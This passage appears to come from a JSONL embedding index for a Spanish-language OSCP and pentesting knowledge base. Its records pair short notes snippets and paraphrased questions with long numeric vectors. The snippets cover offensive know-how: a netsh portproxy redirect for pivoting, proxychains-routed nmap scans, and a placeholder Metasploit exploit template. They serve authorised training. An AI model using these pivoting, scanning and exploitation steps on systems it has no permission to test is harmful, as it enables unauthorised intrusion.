-0.02731, -0.01085, 0.01012, -0.0822, 0.06995, 0.01298, 0.04834, 0.03741, 0.02553, -0.04685, 0.0207, -0.10164, -0.08233, -0.05157, 0.02068, -0.10075, 0.05636, -0.07467, 0.02673, 0.11293, 0.02404, -0.08144, 0.05879, 0.01222, -0.01136, 0.08009, 0.04235, -0.05395, 0.00097, 0.14227, -0.08119, 0.01722, 0.0256, -0.11146, 0.0292, 0.03789, 0.08089, 0.10933, 0.04981, -0.0405, -0.03638, 0.01298, 0.04042, -0.07537, -0.02639, 0.04144, -0.11418, -0.04518, -0.09846, 0.01664, -0.00504, -0.04298, 0.00778, 0.09342, -0.03109, 0.12198, 0.05997, -0.05671, 0.01403, -0.03878, -0.15896, -0.07053, 0.00287, -0.02039, -0.02523, -0.04564, -0.02309, 0.1089, 0.01332, 0.03195, 0.00124, 0.03483, 0.00952, 0.05528, -0.06195, -0.01673, 0.06624, 0.01844, -0.02914, 0.04996, -0.07013, 0.01345, 0.12316, 0.04316, 0.0042, -0.02277, -0.01715, 0.00639, -0.03996, -0.0803, 0.04289, -0.03756, -0.04138, 0.05283, 0.07379, 0.02402, -0.01447, 0.13494, -0.02956, -0.03314, 0.01064, 0.05404, -0.00114, -0.04684, 0.00174, 0.02271, -0.06153, 0.08987, 0.06285, -0.02239, -0.03845, -0.05284, -0.06116, 0.01241, -0.0788, -0.01185, -0.01456, -0.03182, -0.02759, -0.03794, -0.00569, 0.02211, -0.01985, -0.03092, -0.0093, -0.01318, 0.00517, 0.02565, 0.02201, -0.04271, 0.09516, 0.06445, -0.0652, 0.00232, 0.08565, 0.10359, 0.00395, -0.01305, -0.0403, 0.00091, -0.03321, -0.04121, 0.00728, 0.09294, 0.08055, 0.07001, -0.01739, 0.01864, -0.00376, 0.03676, -0.03882, -0.06699, -0.04003, 0.03458, -0.0082, 0.03712, 0.00507, -0.01172, 0.00415, -0.01877, 0.00623, 0.01383, -0.03102, -0.00359, 0.00954, -0.0427, -0.03847, 0.01716, 0.03426, -0.06277, -0.029, 0.00125, -0.025, 0.00317, 0.01955, 0.02203, -0.0249, 0.03993, 0.00391, -0.05292, 0.00254, 0.08244]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows nativo β€” netsh portproxy\n```cmd\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80\n```", "indexar": "con que puedo redirigir el trΓ‘fico del puerto 80 a otro equipo local usando solo las herramientas de Windows?", "v": [-0.12442, -0.00169, -0.13408, -0.15813, -0.00276, -0.00402, 0.02873, -0.02352, 0.00166, -0.14968, -0.07177, -0.06503, 0.00133, -0.04, 0.04329, -0.04604, 0.00247, -0.0193, 0.07197, -0.05988, -0.04359, 0.01717, -0.02105, -0.03187, 0.15335, -0.08228, 0.0234, -0.0391, -0.23035, 0.02051, -0.00189, 0.06002, 0.10197, -0.13743, -0.01813, -0.1339, -0.02996, 0.08329, 0.12581, 0.01187, 0.027, -0.00152, -0.12795, -0.01825, 0.18143, -0.00401, -0.03467, -0.11092, 0.02755, -0.05308, -0.04887, -0.10054, -0.0475, -0.08378, -0.00288, -0.06042, 0.18327, -0.08267, 0.01599, -0.07936, 0.00493, 0.05753, -0.1289, 0.01106, 0.08312, -0.00654, -0.00899, 0.04613, -0.08889, 0.04077, -0.09913, -0.00065, 0.10193, 0.04103, 0.05757, -0.01387, -0.00714, 0.14025, 0.12767, -0.05608, 0.1047, 0.12607, -0.05618, -0.11197, -0.02852, -0.11866, -0.03039, -0.06626, 0.11278, -0.13026, 0.03174, -0.09269, -0.0436, 0.09039, 0.01674, 0.02962, -0.03338, 0.03325, -0.00162, 0.05497, 0.07319, 0.0157, -0.06249, -0.02505, 0.02376, 0.06662, 0.00626, -0.09403, 0.0098, 0.02469, 0.06176, 0.05758, 0.01069, 0.00296, -0.01103, -0.00795, -0.04616, -0.10854, -0.006, -0.00233, 0.00823, -0.07193, -0.05415, -0.01298, -0.05954, -0.08491, 0.02138, 0.14311, 0.0003, -0.0464, 0.09496, 0.02214, -0.09478, -0.05166, -0.07932, 0.03405, 0.02195, -0.02616, -0.06344, -0.01719, 0.00501, 0.09029, 0.00429, -0.0428, 0.06696, 0.03116, -0.03818, -0.02243, -0.02992, -0.06074, 0.05768, -0.03136, -0.02935, 0.06197, -0.0292, 0.07352, 0.08797, 0.04652, -0.01802, -0.07735, -0.04279, 0.00207, -0.0379, -0.00798, 0.02928, -0.00276, -0.03715, 0.06576, 0.08556, -0.04051, -0.06969, 0.05493, -0.02417, -0.07765, 0.01956, -0.01892, -0.03725, -0.06672, -0.07347, -0.02065, -0.02886, 0.00143, -0.0554, -0.0006, -0.0174, -0.00573, -0.10211, 0.04889, 0.00128, 0.02985, -0.09262, -0.00526, 0.02252, -0.06859, -0.04187, 0.07512, -0.06049, -0.0338, -0.00745, -0.00441, -0.00857, 0.05179, 0.04892, -0.03146, 0.01342, 0.0805, -0.10588, -0.00165, 0.02104, 0.06647, 0.04234, -0.05795, 0.02375, -0.02089, -0.02935, -0.0471, 0.00671, -0.0287, -0.00273, 0.05715, 0.02374, 0.06862, 0.01869, 0.04425, -0.0336, -0.00868, -0.0715, 0.02488, 0.06345, 0.00339, -0.00016, 0.04229, -0.02862, -0.032, -0.00644, 0.00724, -0.03845, 0.01101, -0.091, -0.06083, 0.03307, -0.00895, -0.04332, -0.03584, -0.0658, -0.02071, -0.05538, -0.03898, -0.03952, -0.06333, 0.01855, 0.01343, 0.04225, -0.04145, -0.01773, 0.00333]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows nativo β€” netsh portproxy\n```cmd\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80\n```", "indexar": "cual es una alternativa gratuita y nativa para configurar redirecciones de puerto en redes locales?", "v": [-0.05161, -0.00887, -0.14185, -0.09652, 0.08681, -0.02698, 0.04109, -0.0969, -0.14504, -0.14817, -0.07336, -0.15788, 0.05914, -0.07951, 0.01335, -0.0228, -0.02591, 0.0389, 0.17525, -0.07189, -0.11164, -0.08454, -0.09615, -0.01336, 0.07204, -0.00885, 0.06864, -0.05255, -0.07197, 0.03685, 0.02492, 0.0007, 0.02423, -0.00966, -0.10019, 0.02849, 0.10826, 0.00587, -0.03614, -0.04842, 0.07198, -0.02401, -0.09159, 0.05668, 0.04668, -0.01001, -0.11424, -0.08025, -0.05975, -0.01587, -0.02816, 0.00497, -0.13148, -0.03439, -0.03773, 0.02461, 0.12292, -0.16351, -0.08587, 0.00154, 0.0126, -0.00997, 0.02495, 0.01522, 0.06933, -0.02947, -0.04811, 0.01912, -0.11849, 0.0276, 0.03502, 0.09333, 0.00429, -0.00614, 0.07736, 0.12563, -0.00923, 0.03298, 0.10273, 0.08113, 0.00804, 0.00771, 0.01662, 0.00885, -0.08463, -0.07121, -0.03245, -0.15838, 0.05894, -0.0576, -0.00686, -0.09268, 0.07769, 0.04032, -0.02158, -0.10763, 0.01349, 0.01613, -0.04761, 0.04543, 0.03442, 0.03755, -0.08806, 0.05908, 0.08794, 0.01695, -0.07267, -0.02996, 0.09468, -0.02327, 0.08391, 0.00871, 0.05429, 0.01602, 0.00778, -0.107, -0.01367, 0.01378, 0.06053, 0.07904, -0.07623, -0.04013, -0.07372, -0.04967, 0.01061, 0.07203, 0.00611, 0.03986, 0.03042, 0.04035, 0.05583, -0.03009, 0.01476, -0.1562, -0.16206, -0.04452, 0.01878, -0.11516, -0.04789, -0.0645, -0.08068, -0.00206, -0.04488, -0.08979, 0.1092, 0.08498, 0.0347, -0.10406, -0.04682, 0.0487, -0.05693, 0.04164, -0.10231, 0.06125, -0.06222, 0.14878, 0.03862, -0.04005, -0.00967, 0.04664, 0.01762, -0.06179, -0.02077, -0.02232, -0.09334, -0.07091, -0.08712, 0.01914, 0.0773, 0.02153, -0.0534, 0.11476, -0.11577, -0.06582, -0.0273, -0.02749, -0.00616, -0.06803, 0.01681, -0.03424, -0.00209, 0.04705, -0.04493, -0.01648, -0.02128, -0.05256, -0.01834, -0.01123, 0.00519, 0.03356, -0.01264, -0.03583, -0.06628, 0.02843, 0.02858, -0.01226, 0.01344, -0.05124, -0.04327, 0.00981, -0.04769, 0.0149, 0.00279, -0.02319, 0.03669, 0.05434, -0.06382, 0.0604, -0.05498, 0.10607, -0.03408, -0.00496, 0.06109, -0.0247, -0.04659, 0.00953, 0.06249, -0.07571, 0.01484, 0.00557, 0.04537, 0.03624, 0.02595, 0.04878, -0.00827, 0.01641, 0.0387, 0.00689, 0.0214, 0.03533, -0.01268, -0.01101, -0.04183, -0.00293, -0.00745, 0.02039, 0.06352, 0.07544, -0.04931, -0.03, 0.03731, 0.03673, -0.01677, 0.03468, -0.02134, -0.04451, -0.12118, 0.01108, 0.04412, -0.04108, -0.06647, 0.0878, 0.05486, -0.02541, 0.00261, 0.00481]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## proxychains\n- `proxychains nmap -sT -Pn IP` β†’ usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.\n\nRelacionado: Pivoting ligolo-ng Β· Movimiento lateral Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "que programa me sirve para hacer un escaneo de puertos que pase por mis proxies?", "v": [0.00712, -0.06086, -0.20594, -0.02743, 0.08102, -0.12822, 0.18922, -0.182, -0.11311, -0.08712, -0.02321, 0.18581, 0.0862, -0.14064, -0.03488, -0.07984, 0.04568, 0.08728, 0.1062, 0.16137, -0.07125, 0.03075, -0.05171, -0.06515, 0.03084, 0.07056, -0.00409, 0.0501, -0.11939, 0.02734, -0.08446, 0.07505, 0.08375, -0.1029, 0.08662, -0.12867, 0.10026, -0.05242, 0.11447, 0.07647, 0.06948, -0.02457, -0.03347, -0.06118, 0.09611, -0.13201, -0.03067, -0.01807, 0.02471, -0.00175, -0.03765, -0.0122, -0.08566, 0.09827, 0.02916, -0.07596, -0.02499, -0.03044, -0.08426, -0.05375, -0.05216, 0.07307, 0.05503, -0.12316, -0.03235, -0.07098, 0.05169, 0.03913, -0.09052, 0.01173, -0.03545, 0.03486, 0.08773, -0.04313, -0.09913, -0.09551, -0.02444, -0.00044, 0.0457, 0.01156, 0.01157, 0.01272, -0.03201, 0.001, -0.05959, 0.00325, -0.03184, 0.00748, 0.0585, -0.06113, 0.02676, 0.03049, 0.0058, 0.07009, 0.0821, -0.02203, 0.10874, 0.04033, 0.01371, 0.04038, 0.10577, -0.03061, -0.14539, 0.10769, -0.05071, 0.03344, 0.0301, -0.05718, 0.01189, 0.13154, 0.07663, 0.04604, -0.03224, -0.06482, -0.04376, 0.04138, -0.02127, -0.0961, 0.02309, 0.04746, -0.03108, -0.08483, -0.04436, 0.02588, -0.0006, 0.02175, -0.02864, 0.08959, 0.03725, 0.08245, 0.02787, -0.02094, -0.02835, -0.06864, -0.07317, -0.11856, 0.10253, -0.12063, 0.02787, -0.03454, -0.02974, 0.10079, -0.03759, 0.03748, -0.04041, 0.04141, 0.02844, 0.00112, -0.02515, -0.02762, 0.00335, 0.02351, -0.04982, 0.05142, -0.09051, -0.01887, 0.10509, -0.0004, -0.02787, 0.08262, -0.01874, -0.00409, -0.02759, -0.02735, 0.05358, -0.0895, -0.05087, 0.0088, 0.01641, 0.0365, -0.03862, 0.10861, -0.01943, -0.12518, 0.01528, 0.03913, -0.00639, -0.08293, -0.0151, -0.00213, -0.06888, 0.07876, 0.04326, -0.00245, -0.0364, -0.03811, -0.04563, 0.00458, -0.01949, 0.0722, 0.00126, 0.01217, -0.02252, -0.00925, -0.0413, 0.0397, -0.0023, 0.0191, 0.0456, -0.04073, 0.02664, -0.00247, 0.04186, 0.0077, 0.02525, 0.07315, -0.05805, -0.02225, 0.0631, 0.10991, -0.00219, 0.01902, 0.01083, 0.01448, -0.00435, -0.01007, 0.00112, 0.08856, 0.03824, 0.07737, -0.05175, -0.02231, -0.01798, 0.05692, -0.04282, -0.01005, 0.05656, 0.01144, 0.0494, 0.03325, 0.00944, -0.05889, -0.02365, -0.04992, -0.03844, -0.00785, -0.03833, -0.01749, -0.00209, -0.05968, -0.01654, -0.00614, 0.00732, -0.03548, 0.04081, -0.0358, -0.01303, 0.01178, 0.01999, 0.03012, -0.03732, 0.02164, 0.01015, -0.02495, 0.04979, 0.0063]} -{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## proxychains\n- `proxychains nmap -sT -Pn IP` β†’ usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.\n\nRelacionado: Pivoting ligolo-ng Β· Movimiento lateral Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "con que puedo ejecutar un nmap a travΓ©s de una cadena de proxies sin que el puerto 80 se vea como destino?", "v": [0.04822, -0.05043, -0.10993, 0.03182, 0.0572, 0.09389, 0.15455, -0.04502, -0.1171, -0.11127, 0.00232, 0.11587, 0.05104, -0.11577, -0.0962, -0.0113, -0.02543, 0.10594, 0.09163, 0.01657, -0.09664, -0.05546, -0.00548, -0.0979, 0.07313, 0.06666, 0.10856, 0.16596, -0.13632, -0.06764, -0.0517, 0.00351, 0.15075, -0.13226, 0.10974, -0.07081, -0.04145, 0.08732, 0.03067, 0.07068, -0.00421, 0.02067, -0.02549, -0.02755, 0.04523, 0.02147, -0.05142, 0.00967, -0.0615, -0.09983, -0.06998, 0.01761, -0.19086, 0.02171, 0.01622, -0.01423, 0.06654, -0.01541, 0.00665, 0.02813, 0.03181, 0.03632, -0.01476, -0.08653, -0.02129, -0.04275, -0.05086, 0.01203, -0.11155, -0.10169, -0.04107, -0.06456, 0.00662, 0.06263, 0.01865, -0.06709, -0.01595, 0.0354, 0.05815, 0.03774, 0.05318, -0.03648, -0.10765, -0.07855, -0.04753, -0.04788, -0.02042, -0.02363, 0.06994, -0.09465, 0.09093, -0.04633, -0.03808, 0.07655, 0.03202, -0.03256, -0.00416, -0.04334, -0.02033, 0.01197, 0.09715, 0.05999, -0.12175, 0.07657, 0.00056, 0.09241, -0.03597, 0.0311, 0.03838, 0.04854, 0.08602, 0.03504, 0.00895, -0.17157, -0.09145, -0.02204, -0.06082, -0.09505, 0.03119, -0.051, -0.10252, -0.07735, -0.0014, 0.00177, 0.03111, -0.02002, -0.02832, 0.11022, 0.08283, 0.00996, -0.00137, 0.05156, -0.014, -0.08463, 0.03148, 0.01064, 0.03918, -0.09016, 0.02341, -0.03238, 0.0202, 0.02493, 0.00168, -0.04753, 0.09713, -0.01784, -0.01455, -0.09019, -0.05466, 0.00097, -0.04279, 0.08111, -0.02021, 0.03992, -0.02917, 0.06755, 0.05083, -0.03124, 0.06825, 0.03715, 0.08012, -0.04553, -0.04572, 0.01409, 0.03838, -0.0372, -0.12343, -0.00505, 0.0209, -0.00169, -0.11531, 0.06983, -0.05817, -0.06762, 0.06954, -0.03356, -0.08054, -0.05164, 0.03646, -0.04294, -0.07186, 0.00797, -0.04397, -0.08501, -0.07413, -0.08245, -0.05427, 0.01157, -0.00189, 0.10881, 0.02904, 0.03894, -0.02922, -0.01687, -0.04768, 0.0235, -0.01772, -0.01339, -0.00525, -0.05086, -0.02155, 0.0027, 0.04498, 0.01285, -0.00285, 0.06108, -0.0946, 0.0586, -0.07519, 0.0834, 0.06805, -0.08094, 0.04473, -0.04843, -0.03554, 0.00292, 0.02709, 0.0225, 0.01814, 0.07573, -0.0147, 0.07577, 0.08737, 0.0474, -0.01301, -0.03281, 0.00242, 0.04635, 0.07037, -0.0571, -0.02676, -0.00618, -0.0458, -0.01431, 0.04769, 0.05415, -0.00859, -0.0202, -0.06917, -0.03969, 0.02651, 0.03324, -0.04004, -0.02046, 0.0727, -0.07107, -0.13833, 0.05488, -0.04408, -0.04948, 0.01135, 0.0514, 0.07185, -0.03053, 0.01819, -0.05812]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Metasploit\n\n> ⚠️ **En el examen: solo en UNA mΓ‘quina, y solo el foothold inicial cuenta como \"uso\"** (la post-explotaciΓ³n con meterpreter no cuenta). Ver Reglas de herramientas. Fuente: oscp.trastero.org/metasploit.", "indexar": "que herramienta sirve para realizar un uso de foothold en una sola mΓ‘quina durante el examen?", "v": [-0.04651, 0.06755, -0.20799, -0.17806, -0.03646, -0.14709, -0.1407, -0.04042, 0.01, -0.08489, -0.21645, 0.00905, 0.02805, 0.00395, 0.06841, 0.04162, 0.07751, -0.14944, -0.05569, 0.04889, -0.03797, -0.02055, -0.06208, 0.00398, -0.05834, 0.08611, 0.04306, 0.00278, -0.21174, 0.05249, 0.05269, 0.09135, 0.06128, -0.13729, -0.05663, -0.11798, -0.00282, 0.0009, 0.0006, 0.1084, -0.01635, 0.02537, -0.02521, -0.00043, 0.04633, 0.06573, 0.04566, 0.06048, -0.05033, 0.09503, -0.01209, -0.08465, -0.00954, 0.03648, -0.06497, -0.14672, 0.1668, -0.04169, 0.04435, -0.13067, -0.02767, -0.03263, -0.04558, 0.03368, 0.04455, 0.0008, 0.00429, -0.02884, -0.03206, 0.01091, -0.05029, -0.03662, -0.01438, -0.04035, -0.07119, -0.03038, -0.02393, 0.03652, 0.07974, -0.09128, 0.04435, -0.04239, -0.14623, -0.01626, -0.11327, -0.08359, 0.09504, -0.02847, 0.05122, -0.04867, -0.00061, 0.13491, -0.02172, -0.05571, 0.05058, -0.00719, 0.06774, -0.05118, -0.02571, -0.06708, 0.24034, -0.08676, 0.00698, 0.04308, -0.1137, 0.01717, 0.02447, -0.02319, -0.09563, -0.06806, 0.03149, 0.03778, -0.08267, -0.04794, -0.05073, 0.03993, -0.05429, -0.04072, -0.07165, -0.04204, 0.04613, -0.00834, -0.00119, -0.08172, 0.01357, -0.02668, 0.00607, 0.04001, -0.02242, -0.02932, 0.03968, 0.02875, -0.09844, 0.06354, -0.03699, -0.03197, 0.01105, -0.12136, -0.00205, -0.06772, 0.06461, 0.07693, -0.08302, -0.07387, 0.02766, 0.01609, 0.00323, -0.07468, -0.04509, -0.06546, 0.02831, -0.10061, 0.04479, 0.04872, -0.08384, 0.00128, -0.0088, 0.03826, -0.0913, 0.04014, -0.10946, -0.08053, 0.0017, 0.00429, 0.03664, -0.01843, -0.02281, -0.00594, 0.00808, 0.01294, 0.00378, 0.00038, 0.06, -0.01181, 0.03384, 0.00321, -0.02679, 0.00665, -0.01175, -0.06922, -0.04473, 0.02869, -0.05763, -0.00564, 0.02479, -0.00245, 0.00359, -0.02125, 0.04878, 0.01319, 0.05808, 0.07638, -0.02313, -0.02771, 0.04175, 0.04213, -0.02841, -0.01954, 0.05294, -0.06731, -0.09391, -0.01339, -0.07655, -0.05351, 0.04921, 0.05285, -0.04755, -0.04393, -0.03362, 0.02737, 0.00263, -0.01288, 0.0508, -0.02876, -0.03229, -0.06117, 0.02216, 0.03774, -0.06695, -0.02265, 0.01892, 0.00191, 0.01439, 0.02858, -0.02766, 0.03763, 0.05583, 0.00258, 0.02711, -0.02857, -0.00308, -0.01449, 0.02435, -0.00218, 0.02921, -0.0615, 0.09835, -0.03146, -0.07425, -0.0839, -0.02495, 0.04706, -0.00614, -0.062, -0.02294, -0.02143, 0.00271, -0.0259, -0.02599, -0.0873, -0.0249, -0.02147, 0.03697, 0.00148, 0.01732, 0.02109]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Metasploit\n\n> ⚠️ **En el examen: solo en UNA mΓ‘quina, y solo el foothold inicial cuenta como \"uso\"** (la post-explotaciΓ³n con meterpreter no cuenta). Ver Reglas de herramientas. Fuente: oscp.trastero.org/metasploit.", "indexar": "con que puedo hacer la post-explotaciΓ³n sin contar como uso segΓΊn las reglas del oscp?", "v": [0.13439, 0.07571, -0.09165, -0.0082, 0.03849, -0.14435, 0.05216, -0.00875, -0.06321, -0.07306, -0.10281, -0.0463, 0.08349, -0.02423, 0.05838, -0.05815, -0.02126, -0.00661, -0.02479, 0.01944, -0.1064, -0.09338, 0.0352, 0.03786, -0.01551, 0.01488, 0.07404, -0.13773, -0.16397, -0.01419, -0.05208, 0.06174, -0.00966, -0.13043, -0.03602, 0.10677, -0.06422, -0.0901, 0.03776, 0.07118, -0.07422, 0.01951, -0.11831, 0.04728, 0.10181, 0.01268, -0.0883, 0.04188, -0.12453, -0.04722, -0.02131, -0.08953, -0.05301, -0.03377, -0.01357, -0.0157, 0.01679, -0.01924, 0.00937, -0.01843, 0.00558, 0.02898, -0.01391, 0.02472, -0.00542, 0.01385, 0.03734, 0.07372, 0.0331, 0.08113, 0.02791, 0.0812, -0.08311, 0.0018, 0.07815, 0.02038, -0.0258, -0.0034, 0.06149, -0.0929, -0.08715, -0.05742, -0.03745, 0.01144, -0.01703, -0.04894, 0.11863, -0.04843, 0.00365, -0.1312, 0.0547, 0.03148, -0.01522, -0.08949, 0.03843, -0.12965, -0.06694, 0.08908, 0.14232, 0.0969, 0.06323, -0.00492, -0.04658, 0.01379, 0.02465, 0.0389, 0.18879, -0.13364, 0.03224, -0.08584, -0.00856, 0.0361, -0.08093, -0.07907, 0.00533, -0.00797, -0.13388, -0.05489, -0.05715, -0.04005, -0.04158, -0.06201, 0.03197, 0.07714, 0.10221, -0.05248, -0.00716, 0.1274, 0.07385, -0.00472, -0.06236, -0.03987, -0.03801, 0.03141, 0.02373, -0.08405, -0.06486, 0.01484, -0.08637, -0.02959, 0.033, 0.06329, -0.11399, -0.07491, 0.06859, -0.03943, -0.00474, -0.11995, -0.06572, -0.04382, 0.0878, -0.00604, 0.00962, 0.07399, -0.03636, 0.03747, 0.02924, -0.03925, 0.01847, 0.07598, 0.0282, -0.01673, -0.02865, 0.03547, 0.03594, 0.05363, 0.00168, -0.11068, 0.00534, -0.01588, -0.04264, 0.05039, 0.03641, 0.02579, 0.02731, -0.04703, -0.06632, 0.02434, 0.04555, -0.03924, -0.02175, 0.09525, -0.10831, -0.01637, -0.04502, 0.0316, 0.01266, 0.01092, -0.01235, 0.05756, 0.06358, 0.05624, 0.09224, 0.01909, -0.03661, -0.08609, -0.03566, 0.09968, 0.03928, -0.04767, 0.0048, 0.06145, -0.06982, -0.02834, 0.08827, -0.01258, -0.06016, 0.08038, -0.06789, 0.04931, 0.08751, -0.07524, 0.03421, -0.05409, -0.09677, -0.00807, 0.08359, -0.05673, -0.01371, -0.02076, -0.00281, 0.10841, 0.06374, -0.01493, -0.00419, 0.00418, 0.05372, 0.02303, 0.03746, 0.07656, -0.05474, 0.04535, -0.0795, -0.02134, 0.02562, 0.02311, 0.03873, -0.03486, -0.08274, -0.06455, 0.04257, 0.07155, -0.01044, 0.00073, -0.01601, -0.05872, -0.03785, 0.04132, -0.025, -0.09823, 0.004, 0.00304, 0.1034, -0.02663, -0.0162, -0.02261]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## BΓ‘sico\n```\nmsfconsole -q\nsearch \nuse exploit/...\nshow options ; set RHOSTS IP ; set LHOST TU_IP ; run\n```", "indexar": "quΓ© programa sirve para buscar vulnerabilidades en un servidor especΓ­fico?", "v": [-0.02057, 0.0659, -0.18501, -0.15282, -0.0281, -0.13636, 0.02615, -0.18009, 0.03406, -0.08692, -0.01538, -0.05264, -0.03292, -0.12412, 0.03385, 0.05263, 0.14682, -0.14863, 0.08464, 0.10246, 0.02601, -0.04418, 0.04302, -0.05423, -0.14236, 0.02614, 0.01853, -0.07465, -0.06749, -0.03626, -0.02728, -0.02489, 0.0483, -0.05236, -0.00375, 0.03749, 0.01818, 0.05296, -0.07795, 0.02805, 0.12417, 0.03269, -0.09014, 0.02073, 0.08357, -0.05138, 0.04383, -0.06923, 0.03167, 0.01691, -0.05957, 0.00676, -0.11884, -0.034, 0.01846, -0.00431, 0.04131, -0.15541, 0.05627, 0.00167, -0.16367, 0.00519, 0.04018, -0.07327, 0.10859, -0.021, 0.02417, -0.01009, -0.09536, -0.04614, -0.0757, -0.01027, 0.04902, -0.065, 0.02376, 0.07522, 0.00152, 0.01799, 0.03852, -0.02169, 0.02814, 0.06966, -0.01076, 0.13067, -0.15639, -0.07056, 0.11353, 0.01999, 0.05121, -0.02109, 0.12581, 0.13836, -0.10557, 0.08257, 0.01028, -0.04585, 0.17093, -0.00747, 0.00665, 0.05202, 0.04354, -0.05008, -0.05188, 0.11618, -0.0232, 0.12671, 0.07287, -0.04013, -0.01381, -0.01748, 0.03274, -0.06969, -0.03598, -0.02682, -0.04242, -0.03901, -0.00016, -0.01038, 0.11634, 0.01758, -0.10955, -0.00863, -0.01635, 0.05492, 0.05464, -0.03169, 0.03099, 0.05263, -0.00373, 0.0205, -0.01388, -0.02436, -0.07005, 0.02814, -0.05516, -0.00041, 0.08411, -0.05816, -0.07095, -0.00919, 0.06411, -0.00184, 0.0053, 0.01921, 0.07105, 0.03424, 0.13004, -0.07053, -0.05541, 0.04444, 0.03227, -0.04759, -0.0321, 0.01454, -0.11832, -0.03151, -0.02297, -0.06706, -0.09715, 0.08757, 0.01285, 0.05686, -0.03514, 0.02244, 0.07877, -0.00901, 0.01594, 0.05641, 0.1294, 0.09279, -0.03639, 0.06498, 0.03656, -0.08635, -0.0114, -0.0228, -0.02619, -0.08652, 0.022, -0.00962, -0.08529, -0.01216, 0.05496, 0.01351, -0.05399, -0.06037, -0.01774, -0.00161, 0.02664, 0.00644, -0.0078, -0.03434, -0.05772, 0.02619, 0.0269, -0.04636, -0.03111, -0.01028, -0.01725, -0.06458, -0.08297, -0.0206, -0.01931, -0.01716, 0.05799, 0.07315, -0.02835, -0.01945, 0.0527, 0.11587, -0.03037, -0.01747, 0.09846, -0.00439, -0.04991, -0.0341, 0.05975, 0.02608, 0.04101, 0.01656, -0.03216, -0.0332, 0.01291, 0.06314, 0.0216, -0.01454, 0.02293, -0.04114, 0.02796, 0.02938, -0.01559, -0.01724, -0.07834, -0.03866, 0.0349, -0.03878, 0.00477, -0.01937, -0.03223, -0.07866, 0.0066, 0.07122, -0.0165, -0.07813, -0.01089, -0.05125, -0.02815, 0.01857, -0.03082, -0.02174, -0.04975, 0.00936, 0.01773, -0.08418, 0.04463, -0.03817]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## BΓ‘sico\n```\nmsfconsole -q\nsearch \nuse exploit/...\nshow options ; set RHOSTS IP ; set LHOST TU_IP ; run\n```", "indexar": "con quΓ© herramienta puedo configurar una prueba de penetraciΓ³n bΓ‘sica?", "v": [0.02621, 0.17609, -0.22499, -0.20758, 0.11246, -0.07438, -0.03515, 0.00515, -0.06701, -0.08629, -0.10441, 0.11386, -0.10497, -0.08267, -0.02041, 0.09007, -0.01532, -0.12765, -0.03095, -0.01192, 0.01028, -0.07431, -0.09621, -0.01133, -0.04888, 0.06881, 0.01327, 0.01323, -0.10337, -0.08212, -0.04371, 0.00486, 0.07223, -0.00808, -0.11518, -0.03419, -0.07755, 0.03403, 0.08059, 0.08601, -0.0006, -0.03712, 0.06133, 0.07811, 0.10435, -0.0014, 0.03538, 0.02416, -0.07095, -0.05115, 0.02703, -0.091, -0.09197, -0.0299, -0.06537, -0.1436, 0.22507, -0.16426, 0.03963, -0.09556, -0.0489, -0.00621, 0.01828, -0.00968, 0.03847, -0.02381, 0.00424, -0.04772, -0.03647, 0.05215, 0.01478, 0.04555, -0.06517, -0.08248, 0.00751, 0.02254, 0.05227, 0.03153, 0.12017, 0.03492, 0.05587, 0.02654, -0.05062, -0.03082, -0.11596, -0.08231, 0.05104, -0.06574, 0.04946, -0.11215, 0.04284, 0.04031, -0.0232, 0.00595, 0.01722, 0.01494, 0.08294, -0.06094, -0.05229, -0.0313, 0.14612, -0.06176, -0.16624, 0.15582, -0.01838, -0.00902, 0.00183, -0.02507, -0.00978, -0.11863, 0.06567, 0.05036, -0.0815, -0.07796, -0.03396, 0.0683, -0.02789, -0.05069, -0.04351, -0.10611, 0.00714, 0.05244, -0.07536, -0.00165, 0.01375, 0.01518, 0.00881, 0.08263, -0.01393, 0.03033, 0.0847, -0.01684, -0.02722, 0.06046, -0.03245, 0.00419, 0.00439, -0.10572, -0.05597, -0.06917, 0.01494, 0.08056, -0.03146, -0.10449, 0.0392, 0.0515, 0.00171, -0.04921, -0.09633, 0.03864, -0.05386, -0.06283, 0.00259, 0.09117, -0.03544, 0.00101, 0.06588, -0.02598, -0.01371, 0.05816, -0.03739, -0.07162, 0.03206, -0.00883, 0.05268, -0.02762, -0.01045, -0.08596, 0.04788, 0.06085, -0.01297, 0.03255, 0.02107, -0.03235, 0.02053, -0.02731, -0.04867, -0.03971, 0.0065, -0.05466, 0.01073, 0.04174, -0.05496, -0.05924, 0.04097, -0.01516, -0.02754, -0.01136, 0.04973, 0.03467, 0.02927, 0.06376, -0.02026, -0.02028, 0.0768, -0.02302, -0.03933, -0.00685, -0.0355, 0.01253, -0.03079, 